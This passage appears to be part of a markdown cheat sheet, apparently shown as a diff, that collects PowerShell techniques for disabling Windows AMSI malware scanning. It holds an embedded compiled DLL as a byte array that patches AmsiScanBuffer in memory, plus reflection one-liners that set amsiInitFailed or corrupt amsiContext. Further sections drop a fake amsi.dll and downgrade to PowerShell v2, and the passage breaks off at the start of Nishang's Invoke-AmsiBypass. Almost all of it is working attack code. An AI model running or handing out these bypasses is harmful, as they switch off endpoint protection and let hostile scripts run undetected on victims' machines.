110, 3, 0, 0, 2, 0, 119, 0, 0, 0, 3, 0, 9, 2, 9, 0, 142, 2, 1, 0, 17, 0, 142, 2, 6, 0, 25, 0, 142, 2, 10, 0, 41, 0, 142, 2, 16, 0, 49, 0, 142, 2, 16, 0, 57, 0, 142, 2, 16, 0, 65, 0, 142, 2, 16, 0, 73, 0, 142, 2, 16, 0, 81, 0, 142, 2, 16, 0, 89, 0, 142, 2, 16, 0, 105, 0, 142, 2, 6, 0, 121, 0, 137, 2, 35, 0, 121, 0, 162, 3, 38, 0, 129, 0, 184, 0, 44, 0, 137, 0, 98, 3, 49, 0, 153, 0, 115, 3, 54, 0, 177, 0, 51, 2, 62, 0, 177, 0, 131, 3, 67, 0, 121, 0, 125, 2, 76, 0, 97, 0, 142, 2, 6, 0, 46, 0, 11, 0, 126, 0, 46, 0, 19, 0, 135, 0, 46, 0, 27, 0, 166, 0, 46, 0, 35, 0, 175, 0, 46, 0, 43, 0, 230, 0, 46, 0, 51, 0, 246, 0, 46, 0, 59, 0, 1, 1, 46, 0, 67, 0, 14, 1, 46, 0, 75, 0, 230, 0, 46, 0, 83, 0, 230, 0, 99, 0, 91, 0, 25, 1, 1, 0, 3, 0, 0, 0, 4, 0, 21, 0, 1, 0, 72, 2, 0, 1, 3, 0, 136, 3, 1, 0, 0, 1, 5, 0, 23, 3, 1, 0, 0, 1, 7, 0, 70, 3, 1, 0, 0, 1, 9, 0, 148, 3, 2, 0, 100, 44, 0, 0, 1, 0, 4, 128, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 12, 3, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 82, 0, 123, 0, 0, 0, 0, 0, 4, 0, 3, 0, 0, 0, 0, 0, 0, 107, 101, 114, 110, 101, 108, 51, 50, 0, 95, 95, 83, 116, 97, 116, 105, 99, 65, 114, 114, 97, 121, 73, 110, 105, 116, 84, 121, 112, 101, 83, 105, 122, 101, 61, 51, 0, 60, 77, 111, 100, 117, 108, 101, 62, 0, 60, 80, 114, 105, 118, 97, 116, 101, 73, 109, 112, 108, 101, 109, 101, 110, 116, 97, 116, 105, 111, 110, 68, 101, 116, 97, 105, 108, 115, 62, 0, 53, 49, 67, 65, 70, 66, 52, 56, 49, 51, 57, 66, 48, 50, 69, 48, 54, 49, 68, 52, 57, 49, 57, 67, 53, 49, 55, 54, 54, 50, 49, 66, 70, 56, 55, 68, 65, 67, 69, 68, 0, 115, 114, 99, 0, 110, 101, 116, 115, 116, 97, 110, 100, 97, 114, 100, 0, 82, 117, 110, 116, 105, 109, 101, 70, 105, 101, 108, 100, 72, 97, 110, 100, 108, 101, 0, 67, 111, 110, 115, 111, 108, 101, 0, 104, 77, 111, 100, 117, 108, 101, 0, 112, 114, 111, 99, 78, 97, 109, 101, 0, 110, 97, 109, 101, 0, 87, 114, 105, 116, 101, 76, 105, 110, 101, 0, 86, 97, 108, 117, 101, 84, 121, 112, 101, 0, 67, 111, 109, 112, 105, 108, 101, 114, 71, 101, 110, 101, 114, 97, 116, 101, 100, 65, 116, 116, 114, 105, 98, 117, 116, 101, 0, 68, 101, 98, 117, 103, 103, 97, 98, 108, 101, 65, 116, 116, 114, 105, 98, 117, 116, 101, 0, 65, 115, 115, 101, 109, 98, 108, 121, 84, 105, 116, 108, 101, 65, 116, 116, 114, 105, 98, 117, 116, 101, 0, 84, 97, 114, 103, 101, 116, 70, 114, 97, 109, 101, 119, 111, 114, 107, 65, 116, 116, 114, 105, 98, 117, 116, 101, 0, 65, 115, 115, 101, 109, 98, 108, 121, 70, 105, 108, 101, 86, 101, 114, 115, 105, 111, 110, 65, 116, 116, 114, 105, 98, 117, 116, 101, 0, 65, 115, 115, 101, 109, 98, 108, 121, 73, 110, 102, 111, 114, 109, 97, 116, 105, 111, 110, 97, 108, 86, 101, 114, 115, 105, 111, 110, 65, 116, 116, 114, 105, 98, 117, 116, 101, 0, 65, 115, 115, 101, 109, 98, 108, 121, 67, 111, 110, 102, 105, 103, 117, 114, 97, 116, 105, 111, 110, 65, 116, 116, 114, 105, 98, 117, 116, 101, 0, 67, 111, 109, 112, 105, 108, 97, 116, 105, 111, 110, 82, 101, 108, 97, 120, 97, 116, 105, 111, 110, 115, 65, 116, 116, 114, 105, 98, 117, 116, 101, 0, 65, 115, 115, 101, 109, 98, 108, 121, 80, 114, 111, 100, 117, 99, 116, 65, 116, 116, 114, 105, 98, 117, 116, 101, 0, 65, 115, 115, 101, 109, 98, 108, 121, 67, 111, 109, 112, 97, 110, 121, 65, 116, 116, 114, 105, 98, 117, 116, 101, 0, 82, 117, 110, 116, 105, 109, 101, 67, 111, 109, 112, 97, 116, 105, 98, 105, 108, 105, 116, 121, 65, 116, 116, 114, 105, 98, 117, 116, 101, 0, 66, 121, 116, 101, 0, 100, 119, 83, 105, 122, 101, 0, 115, 105, 122, 101, 0, 83, 121, 115, 116, 101, 109, 46, 82, 117, 110, 116, 105, 109, 101, 46, 86, 101, 114, 115, 105, 111, 110, 105, 110, 103, 0, 80, 97, 116, 99, 104, 0, 65, 109, 115, 105, 0, 65, 108, 108, 111, 99, 72, 71, 108, 111, 98, 97, 108, 0, 77, 97, 114, 115, 104, 97, 108, 0, 107, 101, 114, 110, 101, 108, 51, 50, 46, 100, 108, 108, 0, 65, 109, 115, 105, 66, 121, 112, 97, 115, 115, 46, 100, 108, 108, 0, 83, 121, 115, 116, 101, 109, 0, 83, 121, 115, 116, 101, 109, 46, 82, 101, 102, 108, 101, 99, 116, 105, 111, 110, 0, 111, 112, 95, 65, 100, 100, 105, 116, 105, 111, 110, 0, 90, 101, 114, 111, 0, 46, 99, 116, 111, 114, 0, 85, 73, 110, 116, 80, 116, 114, 0, 83, 121, 115, 116, 101, 109, 46, 68, 105, 97, 103, 110, 111, 115, 116, 105, 99, 115, 0, 83, 121, 115, 116, 101, 109, 46, 82, 117, 110, 116, 105, 109, 101, 46, 73, 110, 116, 101, 114, 111, 112, 83, 101, 114, 118, 105, 99, 101, 115, 0, 83, 121, 115, 116, 101, 109, 46, 82, 117, 110, 116, 105, 109, 101, 46, 67, 111, 109, 112, 105, 108, 101, 114, 83, 101, 114, 118, 105, 99, 101, 115, 0, 68, 101, 98, 117, 103, 103, 105, 110, 103, 77, 111, 100, 101, 115, 0, 82, 117, 110, 116, 105, 109, 101, 72, 101, 108, 112, 101, 114, 115, 0, 65, 109, 115, 105, 66, 121, 112, 97, 115, 115, 0, 71, 101, 116, 80, 114, 111, 99, 65, 100, 100, 114, 101, 115, 115, 0, 108, 112, 65, 100, 100, 114, 101, 115, 115, 0, 79, 98, 106, 101, 99, 116, 0, 108, 112, 102, 108, 79, 108, 100, 80, 114, 111, 116, 101, 99, 116, 0, 86, 105, 114, 116, 117, 97, 108, 80, 114, 111, 116, 101, 99, 116, 0, 102, 108, 78, 101, 119, 80, 114, 111, 116, 101, 99, 116, 0, 111, 112, 95, 69, 120, 112, 108, 105, 99, 105, 116, 0, 100, 101, 115, 116, 0, 73, 110, 105, 116, 105, 97, 108, 105, 122, 101, 65, 114, 114, 97, 121, 0, 67, 111, 112, 121, 0, 76, 111, 97, 100, 76, 105, 98, 114, 97, 114, 121, 0, 82, 116, 108, 77, 111, 118, 101, 77, 101, 109, 111, 114, 121, 0, 111, 112, 95, 69, 113, 117, 97, 108, 105, 116, 121, 0, 0, 0, 0, 17, 97, 0, 109, 0, 115, 0, 105, 0, 46, 0, 100, 0, 108, 0, 108, 0, 0, 87, 69, 0, 82, 0, 82, 0, 79, 0, 82, 0, 58, 0, 32, 0, 67, 0, 111, 0, 117, 0, 108, 0, 100, 0, 32, 0, 110, 0, 111, 0, 116, 0, 32, 0, 114, 0, 101, 0, 116, 0, 114, 0, 105, 0, 101, 0, 118, 0, 101, 0, 32, 0, 97, 0, 109, 0, 115, 0, 105, 0, 46, 0, 100, 0, 108, 0, 108, 0, 32, 0, 112, 0, 111, 0, 105, 0, 110, 0, 116, 0, 101, 0, 114, 0, 33, 0, 0, 29, 65, 0, 109, 0, 115, 0, 105, 0, 83, 0, 99, 0, 97, 0, 110, 0, 66, 0, 117, 0, 102, 0, 102, 0, 101, 0, 114, 0, 0, 117, 69, 0, 82, 0, 82, 0, 79, 0, 82, 0, 58, 0, 32, 0, 67, 0, 111, 0, 117, 0, 108, 0, 100, 0, 32, 0, 110, 0, 111, 0, 116, 0, 32, 0, 114, 0, 101, 0, 116, 0, 114, 0, 105, 0, 101, 0, 118, 0, 101, 0, 32, 0, 65, 0, 109, 0, 115, 0, 105, 0, 83, 0, 99, 0, 97, 0, 110, 0, 66, 0, 117, 0, 102, 0, 102, 0, 101, 0, 114, 0, 32, 0, 102, 0, 117, 0, 110, 0, 99, 0, 116, 0, 105, 0, 111, 0, 110, 0, 32, 0, 112, 0, 111, 0, 105, 0, 110, 0, 116, 0, 101, 0, 114, 0, 33, 0, 0, 117, 69, 0, 82, 0, 82, 0, 79, 0, 82, 0, 58, 0, 32, 0, 67, 0, 111, 0, 117, 0, 108, 0, 100, 0, 32, 0, 110, 0, 111, 0, 116, 0, 32, 0, 109, 0, 111, 0, 100, 0, 105, 0, 102, 0, 121, 0, 32, 0, 65, 0, 109, 0, 115, 0, 105, 0, 83, 0, 99, 0, 97, 0, 110, 0, 66, 0, 117, 0, 102, 0, 102, 0, 101, 0, 114, 0, 32, 0, 109, 0, 101, 0, 109, 0, 111, 0, 114, 0, 121, 0, 32, 0, 112, 0, 101, 0, 114, 0, 109, 0, 105, 0, 115, 0, 115, 0, 105, 0, 111, 0, 110, 0, 115, 0, 33, 0, 0, 83, 71, 0, 114, 0, 101, 0, 97, 0, 116, 0, 32, 0, 115, 0, 117, 0, 99, 0, 99, 0, 101, 0, 115, 0, 115, 0, 46, 0, 32, 0, 65, 0, 109, 0, 115, 0, 105, 0, 83, 0, 99, 0, 97, 0, 110, 0, 66, 0, 117, 0, 102, 0, 102, 0, 101, 0, 114, 0, 32, 0, 112, 0, 97, 0, 116, 0, 99, 0, 104, 0, 101, 0, 100, 0, 33, 0, 32, 0, 58, 0, 41, 0, 0, 0, 0, 0, 94, 196, 134, 67, 207, 43, 76, 71, 180, 110, 209, 17, 221, 107, 164, 138, 0, 4, 32, 1, 1, 8, 3, 32, 0, 1, 5, 32, 1, 1, 17, 17, 4, 32, 1, 1, 14, 13, 7, 10, 24, 24, 25, 9, 29, 5, 24, 2, 8, 2, 2, 2, 6, 24, 5, 0, 2, 2, 24, 24, 4, 0, 1, 1, 14, 4, 0, 1, 25, 11, 7, 0, 2, 1, 18, 81, 17, 85, 4, 0, 1, 24, 8, 8, 0, 4, 1, 29, 5, 8, 24, 8, 5, 0, 2, 24, 24, 8, 8, 204, 123, 19, 255, 205, 45, 221, 81, 3, 6, 17, 16, 4, 0, 1, 24, 14, 5, 0, 2, 24, 24, 14, 8, 0, 4, 2, 24, 25, 9, 16, 9, 6, 0, 3, 1, 24, 24, 8, 3, 0, 0, 8, 8, 1, 0, 8, 0, 0, 0, 0, 0, 30, 1, 0, 1, 0, 84, 2, 22, 87, 114, 97, 112, 78, 111, 110, 69, 120, 99, 101, 112, 116, 105, 111, 110, 84, 104, 114, 111, 119, 115, 1, 8, 1, 0, 7, 1, 0, 0, 0, 0, 54, 1, 0, 25, 46, 78, 69, 84, 83, 116, 97, 110, 100, 97, 114, 100, 44, 86, 101, 114, 115, 105, 111, 110, 61, 118, 50, 46, 48, 1, 0, 84, 14, 20, 70, 114, 97, 109, 101, 119, 111, 114, 107, 68, 105, 115, 112, 108, 97, 121, 78, 97, 109, 101, 0, 15, 1, 0, 10, 65, 109, 115, 105, 66, 121, 112, 97, 115, 115, 0, 0, 10, 1, 0, 5, 68, 101, 98, 117, 103, 0, 0, 12, 1, 0, 7, 49, 46, 48, 46, 48, 46, 48, 0, 0, 10, 1, 0, 5, 49, 46, 48, 46, 48, 0, 0, 4, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32, 92, 168, 168, 0, 1, 77, 80, 2, 0, 0, 0, 100, 0, 0, 0, 128, 43, 0, 0, 128, 13, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 19, 0, 0, 0, 39, 0, 0, 0, 228, 43, 0, 0, 228, 13, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 82, 83, 68, 83, 215, 18, 206, 3, 139, 112, 185, 73, 189, 89, 99, 32, 233, 159, 0, 221, 1, 0, 0, 0, 47, 111, 112, 116, 47, 80, 114, 111, 106, 101, 99, 116, 115, 47, 65, 109, 115, 105, 66, 121, 112, 97, 115, 115, 47, 65, 109, 115, 105, 66, 121, 112, 97, 115, 115, 47, 111, 98, 106, 47, 68, 101, 98, 117, 103, 47, 110, 101, 116, 115, 116, 97, 110, 100, 97, 114, 100, 50, 46, 48, 47, 65, 109, 115, 105, 66, 121, 112, 97, 115, 115, 46, 112, 100, 98, 0, 83, 72, 65, 50, 53, 54, 0, 215, 18, 206, 3, 139, 112, 185, 169, 125, 89, 99, 32, 233, 159, 0, 221, 32, 92, 168, 40, 54, 252, 229, 155, 150, 128, 72, 101, 126, 213, 146, 143, 51, 44, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 77, 44, 0, 0, 0, 32, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 63, 44, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 95, 67, 111, 114, 68, 108, 108, 77, 97, 105, 110, 0, 109, 115, 99, 111, 114, 101, 101, 46, 100, 108, 108, 0, 0, 0, 0, 0, 0, 255, 37, 0, 32, 0, 16, 49, 255, 144, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 16, 0, 0, 0, 24, 0, 0, 128, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 48, 0, 0, 128, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 72, 0, 0, 0, 88, 64, 0, 0, 212, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 212, 2, 52, 0, 0, 0, 86, 0, 83, 0, 95, 0, 86, 0, 69, 0, 82, 0, 83, 0, 73, 0, 79, 0, 78, 0, 95, 0, 73, 0, 78, 0, 70, 0, 79, 0, 0, 0, 0, 0, 189, 4, 239, 254, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 63, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 68, 0, 0, 0, 1, 0, 86, 0, 97, 0, 114, 0, 70, 0, 105, 0, 108, 0, 101, 0, 73, 0, 110, 0, 102, 0, 111, 0, 0, 0, 0, 0, 36, 0, 4, 0, 0, 0, 84, 0, 114, 0, 97, 0, 110, 0, 115, 0, 108, 0, 97, 0, 116, 0, 105, 0, 111, 0, 110, 0, 0, 0, 0, 0, 0, 0, 176, 4, 52, 2, 0, 0, 1, 0, 83, 0, 116, 0, 114, 0, 105, 0, 110, 0, 103, 0, 70, 0, 105, 0, 108, 0, 101, 0, 73, 0, 110, 0, 102, 0, 111, 0, 0, 0, 16, 2, 0, 0, 1, 0, 48, 0, 48, 0, 48, 0, 48, 0, 48, 0, 52, 0, 98, 0, 48, 0, 0, 0, 54, 0, 11, 0, 1, 0, 67, 0, 111, 0, 109, 0, 112, 0, 97, 0, 110, 0, 121, 0, 78, 0, 97, 0, 109, 0, 101, 0, 0, 0, 0, 0, 65, 0, 109, 0, 115, 0, 105, 0, 66, 0, 121, 0, 112, 0, 97, 0, 115, 0, 115, 0, 0, 0, 0, 0, 62, 0, 11, 0, 1, 0, 70, 0, 105, 0, 108, 0, 101, 0, 68, 0, 101, 0, 115, 0, 99, 0, 114, 0, 105, 0, 112, 0, 116, 0, 105, 0, 111, 0, 110, 0, 0, 0, 0, 0, 65, 0, 109, 0, 115, 0, 105, 0, 66, 0, 121, 0, 112, 0, 97, 0, 115, 0, 115, 0, 0, 0, 0, 0, 48, 0, 8, 0, 1, 0, 70, 0, 105, 0, 108, 0, 101, 0, 86, 0, 101, 0, 114, 0, 115, 0, 105, 0, 111, 0, 110, 0, 0, 0, 0, 0, 49, 0, 46, 0, 48, 0, 46, 0, 48, 0, 46, 0, 48, 0, 0, 0, 62, 0, 15, 0, 1, 0, 73, 0, 110, 0, 116, 0, 101, 0, 114, 0, 110, 0, 97, 0, 108, 0, 78, 0, 97, 0, 109, 0, 101, 0, 0, 0, 65, 0, 109, 0, 115, 0, 105, 0, 66, 0, 121, 0, 112, 0, 97, 0, 115, 0, 115, 0, 46, 0, 100, 0, 108, 0, 108, 0, 0, 0, 0, 0, 40, 0, 2, 0, 1, 0, 76, 0, 101, 0, 103, 0, 97, 0, 108, 0, 67, 0, 111, 0, 112, 0, 121, 0, 114, 0, 105, 0, 103, 0, 104, 0, 116, 0, 0, 0, 32, 0, 0, 0, 70, 0, 15, 0, 1, 0, 79, 0, 114, 0, 105, 0, 103, 0, 105, 0, 110, 0, 97, 0, 108, 0, 70, 0, 105, 0, 108, 0, 101, 0, 110, 0, 97, 0, 109, 0, 101, 0, 0, 0, 65, 0, 109, 0, 115, 0, 105, 0, 66, 0, 121, 0, 112, 0, 97, 0, 115, 0, 115, 0, 46, 0, 100, 0, 108, 0, 108, 0, 0, 0, 0, 0, 54, 0, 11, 0, 1, 0, 80, 0, 114, 0, 111, 0, 100, 0, 117, 0, 99, 0, 116, 0, 78, 0, 97, 0, 109, 0, 101, 0, 0, 0, 0, 0, 65, 0, 109, 0, 115, 0, 105, 0, 66, 0, 121, 0, 112, 0, 97, 0, 115, 0, 115, 0, 0, 0, 0, 0, 48, 0, 6, 0, 1, 0, 80, 0, 114, 0, 111, 0, 100, 0, 117, 0, 99, 0, 116, 0, 86, 0, 101, 0, 114, 0, 115, 0, 105, 0, 111, 0, 110, 0, 0, 0, 49, 0, 46, 0, 48, 0, 46, 0, 48, 0, 0, 0, 56, 0, 8, 0, 1, 0, 65, 0, 115, 0, 115, 0, 101, 0, 109, 0, 98, 0, 108, 0, 121, 0, 32, 0, 86, 0, 101, 0, 114, 0, 115, 0, 105, 0, 111, 0, 110, 0, 0, 0, 49, 0, 46, 0, 48, 0, 46, 0, 48, 0, 46, 0, 48, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32, 0, 0, 12, 0, 0, 0, 96, 60, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0)) | + Out-Null; + Write-Output "DLL has been reflected"; + } + [Bypass.AMSI]::Patch(); +} +MyPatch; +Start-Sleep 1; +``` + +# Using Matt Graebers Reflection method + +```ps1 +[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true) +``` +# Using Matt Graebers Reflection method with WMF5 autologging bypass + +```ps1 +[Delegate]::CreateDelegate(("Func``3[String, $(([String].Assembly.GetType('System.Reflection.Bindin'+'gFlags')).FullName), System.Reflection.FieldInfo]" -as [String].Assembly.GetType('System.T'+'ype')), [Object]([Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')),('GetFie'+'ld')).Invoke('amsiInitFailed',(('Non'+'Public,Static') -as [String].Assembly.GetType('System.Reflection.Bindin'+'gFlags'))).SetValue($null,$True) +``` + +## Using Matt Graebers second Reflection method + +```ps1 +[Runtime.InteropServices.Marshal]::WriteInt32([Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiContext',[Reflection.BindingFlags]'NonPublic,Static').GetValue($null),0x41414141) +``` + +## Using Cornelis de Plaas DLL hijack method + +```ps1 +[Byte[]] $temp = $DllBytes -split ' ' +Write-Output "Executing the bypass." +Write-Verbose "Dropping the fake amsi.dll to disk." +[System.IO.File]::WriteAllBytes("$pwd\amsi.dll", $temp) + +Write-Verbose "Copying powershell.exe to the current working directory." +Copy-Item -Path C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Destination $pwd + +Write-Verbose "Starting powershell.exe from the current working directory." +& "$pwd\powershell.exe" +``` + +## Using PowerShell version 2 + +```ps1 +if ($ShowOnly -eq $True) +{ + Write-Output "If .Net version 2.0.50727 is installed, run powershell -v 2 and run scripts from the new PowerShell process." +} +else +{ + Write-Verbose "Checking if .Net version 2.0.50727 is installed." + $versions = Get-ChildItem 'HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP' -recurse | Get-ItemProperty -name Version -EA 0 | Where { $_.PSChildName -match '^(?!S)\p{L}'} | Select -ExpandProperty Version + if($versions -match "2.0.50727") + { + Write-Verbose ".Net version 2.0.50727 found." + Write-Output "Executing the bypass." + powershell.exe -version 2 + } + else + { + Write-Verbose ".Net version 2.0.50727 not found. Can't start PowerShell v2." + } +} +``` + +## Nishang all in one + +```ps1 +function Invoke-AmsiBypass +{ +<# +.SYNOPSIS +Nishang script which uses publicly known methods to bypass/avoid AMSI. + +.DESCRIPTION +This script implements publicly known methods bypass or avoid AMSI on Windows machines. + +AMSI is a script malware detection mechanism enabled by default in Windows 10. +(https://msdn.microsoft.com/en-us/library/windows/desktop/dn889587(v=vs.85).aspx) + +This script implements 6 methods of bypassing AMSI. +unload - Method by Matt Graeber. Unloads AMSI from current PowerShell session. +unload2 - Another method by Matt Graeber. Unloads AMSI from current PowerShell session. +unloadsilent - Another method by Matt Graeber. Unloads AMSI and avoids WMF5 autologging. +unloadobfuscated - 'unload' method above obfuscated with Daneil Bohannon's Invoke-Obfuscation - which avoids WMF5 autologging. +dllhijack - Method by Cornelis de Plaa. The amsi.dll used in the code is from p0wnedshell (https://github.com/Cn33liz/p0wnedShell) +psv2 - If .net 2.0.50727 is available on Windows 10. PowerShell v2 is launched which doesn't support AMSI. + +The script also provides information on tools which can be used for obfuscation: +ISE-Steroids (http://www.powertheshell.com/isesteroidsmanual/download/) +Invoke-Obfuscation (https://github.com/danielbohannon/Invoke-Obfuscation) + +.PARAMETER Method +The method to be used for elevation. Defaut one is unloadsilent. + +.PARAMETER ShowOnly +The bypass is not executed. Just shown to the user. + +.EXAMPLE +PS > Invoke-AmsiBypass -Verbose +Above command runs the unloadsilent method. + +.EXAMPLE +PS > Invoke-PsUACme -Method unloadobfuscated -Verbose +Above command runs the unloadobfuscated method. + +.LINK +http://www.labofapenetrationtester.com/2016/09/amsi.html +https://github.com/samratashok/nishang +#> + + + [CmdletBinding()] Param( + + [Parameter(Position = 0, Mandatory = $False)] + [ValidateSet("unload","unloadsilent","unloadobfuscated","unload2","dllhijack","psv2","obfuscation")] + [String] + $Method = "unloadsilent", + + [Parameter(Position = 1, Mandatory = $False)] + [Switch] + $ShowOnly + ) + + $AmsiX86 = "77 90 144 0 3 0 0 0 4 0 0 0 255 255 0 0 184 0 0 0 0 0 0 0 64 0 0 0 0 0 0 0 0 0 0 0 0 0 0 